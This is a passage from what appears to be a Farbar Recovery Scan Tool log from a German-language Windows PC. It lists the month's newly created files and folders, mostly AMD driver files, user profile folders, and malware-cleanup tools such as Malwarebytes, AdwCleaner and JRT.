2016-04-24 20:11 - 2016-04-24 20:11 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2016-04-24 20:11 - 2016-04-24 20:11 - 00000000 ____D C:\Program Files\Reference Assemblies
2016-04-24 20:11 - 2016-04-24 20:11 - 00000000 ____D C:\Program Files\MSBuild
2016-04-24 20:11 - 2016-04-24 20:11 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2016-04-24 20:11 - 2016-04-24 20:11 - 00000000 ____D C:\Program Files (x86)\MSBuild
2016-04-24 20:11 - 2015-10-23 18:47 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2016-04-24 20:11 - 2015-10-23 18:47 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2016-04-24 20:11 - 2015-10-23 18:47 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2016-04-24 20:11 - 2015-10-23 18:46 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2016-04-24 20:11 - 2015-10-23 18:46 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2016-04-24 20:11 - 2015-10-23 18:45 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2016-04-24 19:45 - 2016-04-24 19:45 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default\Vorlagen
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default\Startmenü
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default\Netzwerkumgebung
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default\Lokale Einstellungen
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default\Eigene Dateien
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default\Druckumgebung
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Videos
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Musik
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default\Documents\Eigene Bilder
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default\AppData\Local\Verlauf
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default\AppData\Local\Anwendungsdaten
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default\Anwendungsdaten
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default User\Documents\Eigene Videos
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default User\Documents\Eigene Musik
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default User\Documents\Eigene Bilder
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default User\AppData\Local\Verlauf
2016-04-24 19:22 - 2016-04-24 19:22 - 00000000 _SHDL C:\Users\Default User\AppData\Local\Anwendungsdaten
2016-04-24 19:19 - 2016-04-24 22:09 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-04-24 19:19 - 2016-04-24 19:19 - 00000000 ____D C:\Users\Default\AppData\Roaming\Media Center Programs
2016-04-24 19:19 - 2016-04-24 19:19 - 00000000 ____D C:\Users\Default\AppData\Roaming\ATI
2016-04-24 19:19 - 2016-04-24 19:19 - 00000000 ____D C:\Users\Default\AppData\Local\ATI
2016-04-24 19:19 - 2016-04-24 19:19 - 00000000 ____D C:\Users\Default User\AppData\Roaming\Media Center Programs
2016-04-24 19:19 - 2016-04-24 19:19 - 00000000 ____D C:\Users\Default User\AppData\Roaming\ATI
2016-04-24 19:19 - 2016-04-24 19:19 - 00000000 ____D C:\Users\Default User\AppData\Local\ATI
2016-04-24 19:17 - 2016-04-26 22:19 - 00000000 ____D C:\Users\Harun
2016-04-24 19:17 - 2016-04-24 19:20 - 00000000 ____D C:\Users\faruk
2016-04-24 19:17 - 2016-04-24 19:20 - 00000000 ____D C:\Users\aysec
2016-04-24 19:17 - 2016-04-24 19:19 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\Harun\Vorlagen
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\Harun\Startmenü
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\Harun\Netzwerkumgebung
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\Harun\Lokale Einstellungen
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\Harun\Eigene Dateien
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\Harun\Druckumgebung
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\Harun\Documents\Eigene Videos
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\Harun\Documents\Eigene Musik
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\Harun\Documents\Eigene Bilder
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\Harun\AppData\Local\Verlauf
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\Harun\AppData\Local\Anwendungsdaten
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\Harun\Anwendungsdaten
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\faruk\Vorlagen
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\faruk\Startmenü
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\faruk\Netzwerkumgebung
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\faruk\Lokale Einstellungen
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\faruk\Eigene Dateien
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\faruk\Druckumgebung
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\faruk\Documents\Eigene Videos
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\faruk\Documents\Eigene Musik
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\faruk\Documents\Eigene Bilder
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\faruk\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\faruk\AppData\Local\Verlauf
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\faruk\AppData\Local\Anwendungsdaten
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\faruk\Anwendungsdaten
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\aysec\Vorlagen
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\aysec\Startmenü
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\aysec\Netzwerkumgebung
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\aysec\Lokale Einstellungen
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\aysec\Eigene Dateien
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\aysec\Druckumgebung
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\aysec\Documents\Eigene Videos
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\aysec\Documents\Eigene Musik
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\aysec\Documents\Eigene Bilder
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\aysec\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\aysec\AppData\Local\Verlauf
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\aysec\AppData\Local\Anwendungsdaten
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 _SHDL C:\Users\aysec\Anwendungsdaten
2016-04-24 19:17 - 2016-04-24 19:17 - 00000000 ____D C:\Program Files\Common Files\SpeechEngines
2016-04-24 19:16 - 2016-04-26 17:11 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2016-04-24 19:16 - 2016-04-24 19:17 - 00000000 ____D C:\Program Files\AMD
2016-04-24 19:16 - 2016-04-24 19:16 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2016-04-24 19:16 - 2016-04-24 19:16 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2016-04-24 19:16 - 2016-04-24 19:16 - 00000000 ____D C:\WINDOWS\system32\DAX2
2016-04-24 19:16 - 2016-04-24 19:16 - 00000000 ____D C:\Program Files\Realtek
2016-04-24 19:16 - 2016-04-24 19:16 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2016-04-24 19:16 - 2016-04-24 19:16 - 00000000 _____ C:\WINDOWS\ativpsrm.bin
2016-04-22 19:09 - 2016-04-24 22:09 - 00000668 _____ C:\Users\Public\Desktop\StarCraft II.lnk
2016-04-22 19:09 - 2016-04-24 19:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II
2016-04-22 19:06 - 2016-04-22 19:16 - 00000000 ____D C:\Users\Harun\Documents\StarCraft II
2016-04-20 17:21 - 2016-04-26 17:11 - 00000667 _____ C:\Users\Harun\Downloads\Fixlog.txt
2016-04-19 16:14 - 2016-04-19 16:14 - 00002273 _____ C:\Users\Harun\Desktop\JRT.txt
2016-04-19 16:06 - 2016-04-19 16:13 - 01610352 _____ (Malwarebytes) C:\Users\Harun\Downloads\JRT.exe
2016-04-19 16:03 - 2016-04-19 16:03 - 03683904 _____ C:\Users\Harun\Downloads\AdwCleaner_5.112 (1).exe
2016-04-19 15:33 - 2016-04-28 21:45 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-04-19 15:33 - 2016-04-24 22:02 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-04-19 15:33 - 2016-04-19 16:11 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2016-04-19 15:32 - 2016-04-19 15:57 - 00000000 ____D C:\Users\Harun\Desktop\mbar
2016-04-19 15:32 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-04-19 13:09 - 2016-04-19 13:09 - 00026993 _____ C:\Users\Harun\Downloads\Logfiles.zip
2016-04-19 13:06 - 2016-04-20 23:39 - 00041199 _____ C:\Users\Harun\Downloads\Addition.txt
2016-04-19 13:05 - 2016-04-28 21:46 - 00016551 _____ C:\Users\Harun\Downloads\FRST.txt
2016-04-19 13:05 - 2016-04-28 21:46 - 00000000 ____D C:\FRST
2016-04-19 13:04 - 2016-04-19 13:05 - 02375680 _____ (Farbar) C:\Users\Harun\Downloads\FRST64.exe
2016-04-19 12:54 - 2016-04-19 12:54 - 00083140 _____ C:\Users\Harun\Downloads\Ereignisse.txt
2016-04-19 12:47 - 2016-04-19 12:47 - 03286400 _____ (Enigma Software Group USA, LLC.) C:\Users\Harun\Downloads\Nicht bestätigt 326517.crdownload
2016-04-19 12:39 - 2016-04-24 22:09 - 00001391 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-04-19 12:39 - 2016-04-24 19:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-04-19 12:39 - 2016-04-19 16:11 - 00000000 ____D C:\AdwCleaner
2016-04-19 12:39 - 2016-04-19 12:39 - 03683904 _____ C:\Users\Harun\Downloads\adwcleaner_5.112.exe
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\Program Files\iPod
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-04-19 12:38 - 2016-04-19 12:38 - 00000000 ____D C:\WINDOWS\System32\Tasks\Apple
2016-04-19 12:38 - 2016-04-19 12:38 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-04-15 16:58 - 2016-04-24 22:07 - 00000000 ____D C:\ProgramData\FwinpF
2016-04-12 16:42 - 2016-04-12 16:42 - 00194320 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\TeeDriverW8x64.sys
2016-04-11 20:03 - 2016-04-24 22:09 - 00000908 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-04-11 20:03 - 2016-04-24 19:21 - 00002278 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2016-04-11 20:03 - 2016-04-11 20:03 - 00000000 ____D C:\Program Files\CCleaner
2016-04-11 15:49 - 2016-04-24 19:21 - 00002038 _____ C:\WINDOWS\System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance
2016-04-11 13:27 - 2016-04-24 22:09 - 00001299 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Radeon Settings.lnk
2016-04-10 22:05 - 2016-04-24 19:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2016-04-10 21:55 - 2016-04-24 22:09 - 00002093 _____ C:\Users\Public\Desktop\Raptr.lnk
2016-04-10 21:55 - 2016-04-24 19:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Raptr
2016-04-10 21:55 - 2016-04-24 19:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2016-04-10 21:55 - 2016-04-11 19:59 - 00000000 ____D C:\Users\Harun\AppData\Roaming\PlaysTV
2016-04-10 21:54 - 2016-04-11 19:59 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Raptr
2016-04-10 17:33 - 2016-04-11 15:26 - 00000000 ____D C:\ProgramData\Xfire
2016-04-10 17:33 - 2016-04-11 13:32 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Xfire
2016-04-10 17:32 - 2016-04-24 22:09 - 00002249 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC TuneUp.lnk
2016-04-10 17:32 - 2016-04-24 22:09 - 00002231 _____ C:\Users\Public\Desktop\AVG PC TuneUp.lnk
2016-04-10 17:32 - 2016-03-29 12:06 - 00053008 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\TURegOpt.exe
2016-04-10 17:32 - 2016-03-29 11:53 - 00044304 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\authuitu.dll
2016-04-10 17:32 - 2016-03-29 11:53 - 00039696 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\SysWOW64\authuitu.dll
2016-04-10 17:31 - 2016-04-19 12:43 - 00000000 ____D C:\Users\Harun\AppData\Local\Avg
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\Users\Harun\AppData\Local\AvgSetupLog
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\ProgramData\Avg
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\Program Files (x86)\AVG
2016-04-05 09:41 - 2016-04-05 09:41 - 00874000 _____ (AMD) C:\WINDOWS\system32\SETAA8A.tmp
2016-04-04 06:16 - 2016-04-04 06:16 - 00458472 _____ C:\WINDOWS\system32\amdmiracast.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00152568 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiuxp64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00141792 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00133528 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiuxpag.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00128384 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00110880 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00102616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00078432 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00078432 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00071704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00071704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2016-04-04 06:15 - 2016-04-04 06:15 - 11625784 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atidxx64.dll
2016-04-04 06:15 - 2016-04-04 06:15 - 09583808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atidxx32.dll
2016-04-04 06:15 - 2016-04-04 06:15 - 09526616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd6a.dll
2016-04-04 06:15 - 2016-04-04 06:15 - 08843208 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiumd64.dll
2016-04-04 06:15 - 2016-04-04 06:15 - 08585696 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdva.dll
2016-04-04 06:15 - 2016-04-04 06:15 - 07392480 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiumdag.dll
2016-04-04 06:15 - 2016-04-04 06:15 - 01517360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2016-04-04 06:15 - 2016-04-04 06:15 - 01245416 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2016-04-04 06:15 - 2016-04-04 06:15 - 00120656 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiu9p64.dll
2016-04-04 06:15 - 2016-04-04 06:15 - 00102616 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiu9pag.dll
2016-04-04 06:12 - 2016-04-04 06:12 - 00296648 _____ (Advanced Micro Devices) C:\WINDOWS\system32\Drivers\amdacpksd.sys
2016-04-04 06:09 - 2016-04-04 06:09 - 26345472 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmdag.sys
2016-04-04 05:32 - 2016-04-04 05:32 - 00701440 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2016-04-04 05:30 - 2016-04-04 05:30 - 00580096 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2016-04-04 05:29 - 2016-04-04 05:29 - 00127488 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2016-04-04 05:28 - 2016-04-04 05:28 - 06884864 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmantle64.dll
2016-04-04 05:28 - 2016-04-04 05:28 - 00113664 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2016-04-04 05:27 - 2016-04-04 05:27 - 00235008 _____ C:\WINDOWS\system32\clinfo.exe
2016-04-04 05:26 - 2016-04-04 05:26 - 48211968 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl64.dll
2016-04-04 05:23 - 2016-04-04 05:23 - 40126976 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl.dll
2016-04-04 05:21 - 2016-04-04 05:21 - 00065024 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2016-04-04 05:21 - 2016-04-04 05:21 - 00059392 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2016-04-04 05:15 - 2016-04-04 05:15 - 26887168 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl12cl64.dll
2016-04-04 05:15 - 2016-04-04 05:15 - 21730304 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\amdocl12cl.dll
2016-04-04 05:11 - 2016-04-04 05:11 - 06956032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2016-04-04 05:02 - 2016-04-04 05:02 - 05398016 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmantle32.dll
2016-04-04 05:00 - 2016-04-04 05:00 - 05420032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2016-04-04 04:48 - 2016-04-04 04:48 - 00134656 _____ C:\WINDOWS\system32\amdhdl64.dll
2016-04-04 04:48 - 2016-04-04 04:48 - 00123392 _____ C:\WINDOWS\SysWOW64\amdhdl32.dll
2016-04-04 04:47 - 2016-04-04 04:47 - 30377984 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atio6axx.dll
2016-04-04 04:41 - 2016-04-04 04:41 - 00698016 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2016-04-04 04:41 - 2016-04-04 04:41 - 00698016 _____ C:\WINDOWS\system32\atiapfxx.blb
2016-04-04 04:41 - 2016-04-04 04:41 - 00097280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2016-04-04 04:41 - 2016-04-04 04:41 - 00089600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2016-04-04 04:37 - 2016-04-04 04:37 - 08473088 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2016-04-04 04:25 - 2016-04-04 04:25 - 25069056 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atioglxx.dll
2016-04-04 04:25 - 2016-04-04 04:25 - 00865280 _____ (AMD) C:\WINDOWS\system32\coinst_16.15.dll
2016-04-04 04:22 - 2016-04-04 04:22 - 06667776 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00367104 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2016-04-04 04:14 - 2016-04-04 04:14 - 00062464 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalrt64.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00055808 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalcl64.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00052224 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalrt.dll
2016-04-04 04:13 - 2016-04-04 04:13 - 15711744 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticaldd64.dll
2016-04-04 04:13 - 2016-04-04 04:13 - 00049152 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalcl.dll
2016-04-04 04:10 - 2016-04-04 04:10 - 14302208 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticaldd.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00564736 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00442368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00224256 _____ C:\WINDOWS\system32\dgtrayicon.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00209920 _____ C:\WINDOWS\system32\GameManager64.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00204800 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00189952 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00186368 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00162304 _____ C:\WINDOWS\system32\atieah64.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00145408 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00078336 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2016-04-04 03:56 - 2016-04-04 03:56 - 00251392 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2016-04-04 03:55 - 2016-04-04 03:55 - 00190976 _____ (AMD) C:\WINDOWS\system32\atitmm64.dll
2016-04-04 03:55 - 2016-04-04 03:55 - 00050688 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmmcl6.dll
2016-04-04 03:55 - 2016-04-04 03:55 - 00039424 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmmcl.dll
2016-04-04 03:52 - 2016-04-04 03:52 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2016-04-04 03:49 - 2016-04-04 03:49 - 00204952 _____ C:\WINDOWS\SysWOW64\ativvsvl.dat
2016-04-04 03:49 - 2016-04-04 03:49 - 00204952 _____ C:\WINDOWS\system32\ativvsvl.dat
2016-04-04 03:49 - 2016-04-04 03:49 - 00157144 _____ C:\WINDOWS\SysWOW64\ativvsva.dat
2016-04-04 03:49 - 2016-04-04 03:49 - 00157144 _____ C:\WINDOWS\system32\ativvsva.dat
2016-04-04 03:42 - 2016-04-04 03:42 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2016-04-04 03:34 - 2016-04-04 03:34 - 00089088 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2016-04-04 03:34 - 2016-04-04 03:34 - 00080896 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2016-04-04 03:33 - 2016-04-04 03:33 - 01276416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00944640 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00944640 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00157696 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00142336 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00075776 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6pxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00070144 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiglpxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00070144 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiglpxx.dll
2016-04-04 03:31 - 2016-04-04 03:31 - 00676864 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\atikmpag.sys
2016-04-04 03:29 - 2016-04-04 03:29 - 00043520 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\ati2erec.dll
2016-04-04 03:28 - 2016-04-04 03:28 - 00195072 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2016-04-04 03:28 - 2016-04-04 03:28 - 00174592 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2016-04-03 23:27 - 2016-04-03 23:27 - 02412544 _____ C:\WINDOWS\system32\amdacpusl.pdb
2016-04-03 23:16 - 2016-04-03 23:16 - 00364544 _____ (Advanced Micro Devices) C:\WINDOWS\system32\amdacpusl.dll
2016-04-03 23:16 - 2016-04-03 23:16 - 00306176 _____ C:\WINDOWS\system32\amdacpusl.pdb.pub
2016-04-03 23:16 - 2016-04-03 23:16 - 00248832 _____ (Advanced Micro Devices) C:\WINDOWS\SysWOW64\amdacpusl.dll
2016-03-30 20:14 - 2016-03-30 20:14 - 00000000 _____ C:\Users\Harun\AppData\Roaming\dc.ogt

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

